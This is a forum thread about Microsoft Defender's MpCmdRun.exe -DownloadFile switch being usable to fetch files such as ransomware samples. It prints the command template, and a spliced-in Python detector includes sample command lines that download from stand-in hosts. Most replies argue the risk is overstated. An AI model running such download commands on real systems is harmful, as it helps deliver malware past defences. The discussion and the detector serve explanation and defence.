A Microsoft Defender update can allow an attacker to download malware to a victim PC

captain_to_fire
Summary

A Microsoft Defender update can allow an attacker to download malware to a PC using command line

 

Quotes

Quote

Discovered by security researcher Mohammad Askar, a recent update to Microsoft Defender's command-line tool now includes a new -DownloadFile command-line argument. This directive allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using the following command:


MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

 

In tests conducted by BleepingComputer.com, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9.

 

mpcmdrun-helpfule.jpg

 

As you can see below, BleepingComputer was able to download the resources.exe file, the WastedLocker Ransomware sample used in a recent Garmin attack.

 

microsoft-defender-lolbin.jpg

The good thing however is that as long as Windows Defender knows about the piece of malware, it's going to be detected and blocked. So far, I haven't seen a blog post from Microsoft acknowledging this, nor were there any CVE details posted in MITRE. While it's a good thing that even though the Defender command line can be used to download malware, it can still pose a risk. By no means am I a security researcher but I can't help but think this bug can be used to execute and elevate privileges as shown in the MITRE ATT&CK framework below.

 

1820077649_MITREATTCKframework.thumb.png.2c06198187a283e193bd94e2c0ed8495.png

 

The reason Microsoft added such functionality is quite odd, it could be for pen testers or security researchers but I think this functionality should be turned off for most users who use Windows Defender as their antivirus of choice. Such attacks may not be a problem for large enterprises as those can afford an EDR sensor, internet gateway proxies and a team of security researchers but for small businesses and most consumers, it could pose a problem imo as these could also be victims of targeted attacks too. Askar said however on Twitter that even if the command line was able to download a piece of malware, it will not execute on its own. I'm guessing that this attack requires the malefactor having the PC in their hand but as far as I know, there are ways to launch PowerShell or elevated command prompt remotely.

 

Sources

Twitter (@Mohammad Askar), Bleeping Computer
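
A defender-side check for the command line quoted in the post above, added here as an example and not part of the original post or the quoted article: it scans process-creation command lines for `MpCmdRun.exe` invoked with `-DownloadFile` and extracts the URL and save path for triage. The sample events, the function names and the case-insensitive switch matching are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation command lines (the kind of field found in
# Sysmon Event ID 1 or Security 4688 records); none come from the thread.
SAMPLE_EVENTS = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'MpCmdRun.exe -DownloadFile -url https://files.example.test/a.bin -path C:\Users\Public\a.bin',
    r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -downloadfile -URL "http://198.51.100.7/x" -Path "C:\Temp\my file.exe"',
    r'powershell.exe -NoProfile -Command Get-MpComputerStatus',
]
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # a quoted argument, or a bare token

def tokenize(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN.finditer(cmdline)]

def switch_value(tokens, name):
    """Return the token following switch `name` (case-insensitive), or None."""
    lowered = [t.lower() for t in tokens]
    if name in lowered:
        i = lowered.index(name)
        if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            return tokens[i + 1]
    return None

def detect_download(cmdline):
    """Return a finding dict for MpCmdRun.exe -DownloadFile, else None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    # Compare the image's file name only; case-insensitivity is an assumption.
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "mpcmdrun.exe" or "-downloadfile" not in [t.lower() for t in tokens[1:]]:
        return None
    url = switch_value(tokens, "-url")
    host = urlsplit(url).hostname if url else None
    return {"url": url, "host": host, "path": switch_value(tokens, "-path")}

def scan(events):
    """Return the findings for every matching command line, in order."""
    return [f for f in map(detect_download, events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
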

Or you can just not use windows.


17 minutes ago, williamcll said:

Or you can just not use windows.

tell that to businesses and government offices who use Windows since the 90s


25 minutes ago, like_ooh_ahh said:

government offices who use Windows since the 90s

They still use Windows 7, so this doesn't affect them much anyhow.


Well like, you can download files using your browser, cmd, PowerShell etc etc so I'm not really seeing a security risk here? Not sure on the purpose of the DownloadFile switch on the program but I doubt it's used for any definition updates or the AV engine, that's already covered a different way. Wouldn't be surprised if the purpose is to be used for downloading files so that Defender scans them and rates them on the spot. Sadly the documentation doesn't currently have DownloadFile in there so we don't have the description of what Microsoft intends for that switch.

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus

 

Either way this seems a little bit blown out of proportion, it's not adding any risk and multiple other programs and system tools allow you to do the exact same thing. Here's a good idea, don't download viruses, don't run random scripts, if something asks for administrative permissions that you did not expect close the dialogue (don't even click no unless you have to).

 

The reason there is no CVE, and likely never will be, is because it's not a vulnerability, people doing dumb things with given tools don't get given CVEs.


40 minutes ago, leadeater said:

Well like, you can download files using your browser, cmd, PowerShell etc etc so I'm not really seeing a security risk here? Not sure on the purpose of the DownloadFile switch on the program but I doubt it's used for any definition updates or the AV engine, that's already covered a different way. Wouldn't be surprised if the purpose is to be used for downloading files so that Defender scans them and rates them on the spot. Sadly the documentation doesn't currently have DownloadFile in there so we don't have the description of what Microsoft intends for that switch.

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus

 

Either way this seems a little bit blown out of proportion, it's not adding any risk and multiple other programs and system tools allow you to do the exact same thing. Here's a good idea, don't download viruses, don't run random scripts, if something asks for administrative permissions that you did not expect close the dialogue (don't even click no unless you have to).

 

The reason there is no CVE, and likely never will be, is because it's not a vulnerability, people doing dumb things with given tools don't get given CVEs.

People must be really young and we must be really old... Such commands were VERY common for use in file download managers which triggered file scanning upon file download in the download manager. You could also supply this for on-demand scanning of files in P2P software.

 

What shocks me more is that "security researcher" found it and was baffled by it. I can only assume the guy is really young and has never seen a file download manager...


Either I'm missing something big here or this has been blown totally out of proportion.  If an attacker is able to run commands on your PC like this to make your PC download something they want you to have, you're already infected/compromised, so that feels like a catch 22.  Moreover, the ability to download a file with the command line doesn't seem unusual to me... have they not heard of wget?


2 hours ago, leadeater said:

this seems a little bit blown out of proportion

3 minutes ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion.

I would agree with this conclusion. I do not believe I could add more.


So a program in Windows has the ability to pull files from the internet? Add it to the list of pretty much every program you install these days.

 

How about he shows us the ability to pull and execute an exploit without triggering the system AV RTP, you know, since he's apparently a security expert.

 

1 hour ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion.  If an attacker is able to run commands on your PC like this to make your PC download something they want you to have, you're already infected/compromised, so that feels like a catch 22.  Moreover, the ability to download a file with the command line doesn't seem unusual to me... have they not heard of wget?

And this as well, to even trigger the download at all someone must already have control of the target.


4 hours ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion

Considering the only "big" tech publications that have reported on this are Bleeping Computer and Tom's Guide (plenty of smaller ones have too) I think the ones that stopped and actually thought about this figured out it's a non event. I know I'm already skeptical about this but I'm not exactly seeing much widespread reporting on it so 🤷‍♂️

 

Feels more like "getting your name out there" than a security risk that has merit, name of the game though in the security field if you want to be more than just an employee of a security firm doing standard contract work.
